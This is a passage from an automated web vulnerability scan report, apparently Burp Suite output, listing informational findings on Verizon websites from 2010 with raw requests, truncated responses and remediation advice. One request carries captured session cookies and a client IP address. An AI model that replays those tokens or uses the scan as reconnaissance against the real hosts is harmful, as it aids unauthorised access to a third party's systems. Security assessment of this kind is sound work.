Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


7.1. http://www22.verizon.com/Residential/HighSpeedInternet/CheckAvailability/CheckAvailability.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HighSpeedInternet/CheckAvailability/CheckAvailability.htm

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /Residential/HighSpeedInternet/CheckAvailability/CheckAvailability.htm?bannerid=BannerDry1m HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; 
RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 62955
Expires: Sat, 20 Nov 2010 03:08:40 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:08:40 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | High Speed Internet | Check Availability
</title><meta name="keywords" content="how to get verizon high speed internet, order verizon high
...[SNIP]...
<LI><A style="WIDTH: 63px" id=GHWireless title="Verizon Wireless" href="http://www.verizonwireless.com/" name=&amp;lid=hp_wireless_tab>Wireless</A>
...[SNIP]...
<LI><A href="http://www.verizonwireless.com/b2c/index.html" name=&amp;lid=overlay_phone_wireless><IMG alt="" src="/Content/Commonfiles/images/globalheader/new_header/i/wireless.gif">
...[SNIP]...
<DIV class="col12 clear icons"><A href="http://www.bbbonline.org/cks.asp?id=108072593112" name=&lid=hp_res_footer_bbb_logo target=_blank><IMG alt="Click to verify BBB accreditation and to see a BBB report." src="/Content/LearnShop/Images/footer/bbb.jpg"></A><A href="http://www.truste.org/ivalidate.php?url=www.verizon.com&sealid=101" name=&lid=hp_res_footer_truste_logo target=_blank><IMG class=bright alt="Reviewed by TRUSTe site privacy statement." src="/Content/LearnShop/Images/footer/truste.jpg">
...[SNIP]...
<LI><A href="http://www.thinkfinity.org/" name=&lid=hp_bus_footer_vzthinkfinity>Verizon Thinkfinity</A>
...[SNIP]...

7.2. http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.aspx?NRMODE=Published&NRNODEGUID=%7bAB8BA7AD-DEF3-46C6-A604-9A615595AE37%7d&NRORIGINALURL=%2fResidential%2fHighSpeedInternet%2fHSIvsCable%2fHSIvsCable.htm%3fCMP%3dBAC-MXT_D_P2_CS_Z_Q_N_Z330&NRCACHEHINT=ModifyGuest&CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330 HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 71589
Expires: Sat, 20 Nov 2010 03:07:09 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:07:09 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | High Speed Internet:&nbsp;Compare to&nbsp;Cable
</title><link rel="stylesheet" type="text/css" href="/Content/Commonfiles/includes/css/pro
...[SNIP]...
<LI><A style="WIDTH: 63px" id=GHWireless title="Verizon Wireless" href="http://www.verizonwireless.com/" name=&lid=hp_wireless_tab>Wireless</A>
...[SNIP]...
<LI><A href="http://www.verizonwireless.com/b2c/index.html" name=&lid=overlay_phone_wireless><IMG alt="" src="/Content/Commonfiles/images/globalheader/new_header/i/wireless.gif">
...[SNIP]...
<DIV class="col12 clear icons"><A href="http://www.bbbonline.org/cks.asp?id=108072593112" name=&lid=hp_res_footer_bbb_logo target=_blank><IMG alt="Click to verify BBB accreditation and to see a BBB report." src="/Content/LearnShop/Images/footer/bbb.jpg"></A><A href="http://www.truste.org/ivalidate.php?url=www.verizon.com&sealid=101" name=&lid=hp_res_footer_truste_logo target=_blank><IMG class=bright alt="Reviewed by TRUSTe site privacy statement." src="/Content/LearnShop/Images/footer/truste.jpg">
...[SNIP]...
<LI><A href="http://www.thinkfinity.org/" name=&lid=hp_bus_footer_vzthinkfinity>Verizon Thinkfinity</A>
...[SNIP]...

7.3. https://www36.verizon.com/fiostv/web/unprotected/showtime.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www36.verizon.com
Path:   /fiostv/web/unprotected/showtime.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /fiostv/web/unprotected/showtime.aspx?CMP=DMC-SMP_D_ZZ_ZZ_E_DO_N_X001 HTTP/1.1
Host: www36.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
RequestInfo: Served From :: BHDP1ISFTW06, Time Taken :: 15.6246
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 24548
Date: Sat, 20 Nov 2010 03:04:03 GMT
Connection: close
Set-Cookie: ASP.NET_SessionId=jr5uzw45kvcuwa554k2q0s2i; path=/; HttpOnly
Set-Cookie: DCReferringURL=/ShowTime.aspx; path=/


<html>
<body onload=ShowtimePlayer()>
<link rel="stylesheet" type="text/css" href="/fiostv/web/Resources/V_111510_1425/css/FTVStyles.css">

<script type="text/javascript">
var TargetURL = '
...[SNIP]...
<div class="Fl_ST"><a href="https://twitter.com/SHOsports" target="_blank">SHOWTIME SPORTS</a>
...[SNIP]...

8. Cross-domain script include
There are 4 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.


8.1. http://www22.verizon.com/Residential/HighSpeedInternet/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HighSpeedInternet/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /Residential/HighSpeedInternet/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 75349
Expires: Sat, 20 Nov 2010 03:07:03 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:07:03 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | Residential High-Speed Internet/Broadband (DSL)
</title><meta name="keywords" content="internet service, isp, internet, email, dsl, cable,
...[SNIP]...
<!--HighSpeedInternet Overview Page--><script type="text/javascript" src="http://d1qpxk1wfeh8v1.cloudfront.net/tags/tt16_1002.js" ></script>
...[SNIP]...

8.2. http://www22.verizon.com/Residential/HighSpeedInternet/Overview/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HighSpeedInternet/Overview/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /Residential/HighSpeedInternet/Overview/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 75372
Expires: Sat, 20 Nov 2010 03:15:06 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:15:06 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | Residential High-Speed Internet/Broadband (DSL)
</title><meta name="keywords" content="internet service, isp, internet, email, dsl, cable,
...[SNIP]...
<!--HighSpeedInternet Overview Page--><script type="text/javascript" src="http://d1qpxk1wfeh8v1.cloudfront.net/tags/tt16_1002.js" ></script>
...[SNIP]...

8.3. http://www22.verizon.com/Residential/HighspeedInternet/FAQ/FAQ.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HighspeedInternet/FAQ/FAQ.htm

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /Residential/HighspeedInternet/FAQ/FAQ.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 103922
Expires: Sat, 20 Nov 2010 03:13:17 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:13:17 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | High Speed Internet: FAQs
</title><meta name="keywords" content="verizon high speed internet faqs, verizon dsl faqs, verizon faqs, verizon
...[SNIP]...
<!--HighSpeedInternet Overview Page--><script type="text/javascript" src="http://d1qpxk1wfeh8v1.cloudfront.net/tags/tt16_1002.js" ></script>
...[SNIP]...

8.4. http://www22.verizon.com/Residential/aboutFiOS/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/aboutFiOS/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /Residential/aboutFiOS/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 76388
Expires: Sat, 20 Nov 2010 03:15:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:15:25 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 03:15:25 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 03:15:25 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 03:15:25 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 03:15:25 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
</Script>

<script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js"></script>
...[SNIP]...

9. Email addresses disclosed

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HighspeedInternet/FAQ/FAQ.htm

Issue detail

The following email address was disclosed in the response:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).

Request

GET /Residential/HighspeedInternet/FAQ/FAQ.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 103922
Expires: Sat, 20 Nov 2010 03:13:17 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:13:17 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | High Speed Internet: FAQs
</title><meta name="keywords" content="verizon high speed internet faqs, verizon dsl faqs, verizon faqs, verizon
...[SNIP]...
<P class=copy>If you are already have a "you@yahoo.com" e-mail account, you can continue to access your mail separately if you wish. However, we highly recommend you give your existing you@yahoo.com account all the benefits of your new Yahoo!. This can be done at no additional charge by linking your "you@yahoo.com" account with your new Verizon Yahoo! account during the registration process. Just imagine all the added value you get from getting additional storage, premium spam functionality, premium virus prote
...[SNIP]...

10. Cacheable HTTPS response
There are 3 instances of this issue:

Issue description

Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.

Issue remediation

The application should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:


10.1. https://www36.verizon.com/fiostv/web/unprotected/showtime.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www36.verizon.com
Path:   /fiostv/web/unprotected/showtime.aspx

Request

GET /fiostv/web/unprotected/showtime.aspx HTTP/1.1
Host: www36.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
RequestInfo: Served From :: BHDP1ISFTW06, Time Taken :: 78.123
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 24516
Date: Sat, 20 Nov 2010 03:04:01 GMT
Connection: close
Set-Cookie: ASP.NET_SessionId=wb5cyl55wlsb3445xgv2idj4; path=/; HttpOnly
Set-Cookie: DCReferringURL=/ShowTime.aspx; path=/


<html>
<body onload=ShowtimePlayer()>
<link rel="stylesheet" type="text/css" href="/fiostv/web/Resources/V_111510_1425/css/FTVStyles.css">

<script type="text/javascript">
var TargetURL = '
...[SNIP]...

10.2. https://www36.verizon.com/fiosvoice/terms/Terms_of_Service.pdf

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www36.verizon.com
Path:   /fiosvoice/terms/Terms_of_Service.pdf

Request

GET /fiosvoice/terms/Terms_of_Service.pdf HTTP/1.1
Host: www36.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Length: 113145
Content-Type: application/pdf
Content-Location: http://www36.verizon.com/fiosvoice/terms/Terms_of_Service.pdf
Last-Modified: Tue, 19 Oct 2010 15:17:37 GMT
Accept-Ranges: bytes
ETag: "4815c0c3a06fcb1:854c"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Expires: Sat, 20 Nov 2010 03:04:16 GMT
Date: Sat, 20 Nov 2010 03:04:16 GMT
Connection: close

%PDF-1.6%....
...[SNIP]...

10.3. https://www36.verizon.com/fiosvoice/userguide/User_Guide.pdf

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www36.verizon.com
Path:   /fiosvoice/userguide/User_Guide.pdf

Request

GET /fiosvoice/userguide/User_Guide.pdf HTTP/1.1
Host: www36.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Length: 5355590
Content-Type: application/pdf
Content-Location: http://www36.verizon.com/fiosvoice/userguide/User_Guide.pdf
Last-Modified: Tue, 31 Aug 2010 16:35:09 GMT
Accept-Ranges: bytes
ETag: "86fd27a2a49cb1:4c04"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Expires: Sat, 20 Nov 2010 03:04:20 GMT
Date: Sat, 20 Nov 2010 03:04:20 GMT
Connection: close

%PDF-1.6%....
20487 0 obj<</First 467/Length 722/Filter/FlateDecode/N 48/Type/ObjStm>>stream
x....j.@.E..@.G=..!d9...Y.,.G...c....>U..6$..&..9...E.R..9..{...Vk.V|.D.. .[..'.dC.I..P.t...6.A...CO..
...[SNIP]...

11. HTML does not specify charset
There are 2 instances of this issue:

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.


11.1. http://www2.verizon.net/help/dsl_settings/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.verizon.net
Path:   /help/dsl_settings/

Request

GET /help/dsl_settings/ HTTP/1.1
Host: www2.verizon.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 139
Content-Type: text/html
Cache-Control: private
Date: Sat, 20 Nov 2010 03:06:55 GMT
Connection: close
Set-Cookie: ASPSESSIONIDSQRTBTDT=IHPHDNIDIIFPACJGGLIHPLLP; path=/


           <script language="javascript">window.location = "http://my.verizon.com/micro/speedoptimizer/hsi/default.aspx"

</script>    
           


11.2. http://www35.vzw.com/HG

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www35.vzw.com
Path:   /HG

Request

GET /HG HTTP/1.1
Host: www35.vzw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DM561203JAVSV6=V1rrrrr"rz%B^rB%irC%r%r%^Qz%zrz%B"%B^rB%irC%z%B^rB%irC%"%B^rB%irQX"%B^rB%irC%r%r%^Q"%Bz(xB$qUfxB$qUxB$haF2_aTf2I~xB$m3qah2U:TxB$m3Icc:DTfxB$~:W2TxB(IFGKz7}z)OuKr6%r^zA6qUf6qU6haF2_aTf2I~6m3qah2U:T6m3Icc:DTf6~:W2T|IFGK; CTG=1290218053; WSS_GW=V1z%B^rB%@ieC; V1Z2=CT; DM570203L6VDV6=V1rrrrr"rz%B^rB%@ieCrire@Bz%zrz%i^"%B^rB%@ieCz%B^rB%@ieC"%B^rB%irQX"%B^rB%@ieCrire@B"%Bz(xB$m2ch:F2faFxB$GffxB$O:maz7}z)OuKr6%%zA6m2ch:F2faF6Gff6O:maA6qUf6qU6haF2_aTf2I~6m3qah2U:T6m3Icc:DTf6~:W2T|IFGK; DM570118F3VNV6=V1rrrrr"rz%B^rB%@ieCrire@Bz%zrzr"%B^rB%@ieCz%B^rB%@ieC"%B^rB%@ieC"%B^rB%@ieCrire@B"rz(xB$m2ch:F2faFxB$GffxB$O:maz7}z)OuKr6%%zA6m2ch:F2faF6Gff6O:ma;

Response

HTTP/1.1 400 Bad Request
Date: Sat, 20 Nov 2010 03:03:30 GMT
Server: Hitbox Gateway 9.3.6-rc1
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP LAW NID PSA ADM OUR IND NAV COM"
Connection: close
Pragma: no-cache
Cache-Control: max-age=0, private, proxy-revalidate
Expires: Sat, 20 Nov 2010 03:03:31 GMT
Content-Type: text/html
Content-Length: 58

<html>
<body>
<p>400 Bad Request</p>
</body>
</html>

12. Content type is not specified
There are 2 instances of this issue:

Issue description

If a web response does not specify a content type, then the browser will usually analyse the response and attempt to determine the MIME type of its content. This can have unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the absence of a content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.


12.1. http://www36.verizon.com/fiostv

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www36.verizon.com
Path:   /fiostv

Request

GET /fiostv HTTP/1.1
Host: www36.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 503 Service Unavailable
Content-Length: 62
Expires: Sat, 20 Nov 2010 03:04:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 03:04:00 GMT
Connection: close

<html><body><b>Http/1.1 Service Unavailable</b></body> </html>

12.2. https://www36.verizon.com/fiostv

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www36.verizon.com
Path:   /fiostv

Request

GET /fiostv HTTP/1.1
Host: www36.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 503 Service Unavailable
Content-Length: 62
Expires: Sat, 20 Nov 2010 03:04:07 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 03:04:07 GMT
Connection: close

<html><body><b>Http/1.1 Service Unavailable</b></body> </html>
